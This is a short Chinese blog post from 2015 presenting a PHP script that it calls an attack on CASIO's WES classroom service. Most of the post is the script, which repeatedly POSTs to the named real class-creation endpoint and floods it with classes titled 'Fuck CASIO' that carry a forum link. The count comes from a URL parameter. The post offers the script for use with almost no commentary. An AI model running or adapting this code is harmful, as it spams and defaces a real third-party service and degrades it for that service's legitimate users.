HBTech's Blog
[更新]攻击CASIO WES的PHP版本
<?php
function post($url, $data){ 
        $postdata = http_build_query($data);
        $opts = array('http' =>
            array(
                'method'  => 'POST',
                'header'  => 'Content-type: application/x-www-form-urlencoded',
                'content' => $postdata
                )
            );
    $context = stream_context_create($opts);
    $result = file_get_contents($url, false, $context);
    return $result;
}
function fuck($times){
    $wes_url = 'http://wes.casio.com/class/' ;
    $i='1';
    do {
        $json = post('http://wes.casio.com/class_api/class.php', 
            array(
                'api' => 'class_create',
                'class_name' => 'Fuck CASIO',
                'class_description' => 'Fuck CASIO <a href="http://tieba.baidu.com/f?kw=fx-es(ms)">By fx-es(ms) Bar</a>'));
        $arr = json_decode($json,true);
        $class_number = $arr['class_number'];
        $class_url = $wes_url . $class_number ;
        echo 'Class Number ' . $i . ' : ' . $class_number . '
' . "\n" ;
        $i++;
    }while ($i <= $times);
}
fuck($_GET['fuck']) ;
?>

此次更新的内容:
懒得多说,图片说明一切:

https://hbtech.oss-cn-shenzhen.aliyuncs.com/blog/2015/11/66666.png

相关链接:论如何攻击CASIO的WES服务

HBTech's Blog

[更新]攻击CASIO WES的PHP版本
<?php function post($url, $data){ $postdata = http_build_query($data); $opts = array('http' => array( 'method' => …
扫描二维码继续阅读
2015-11-27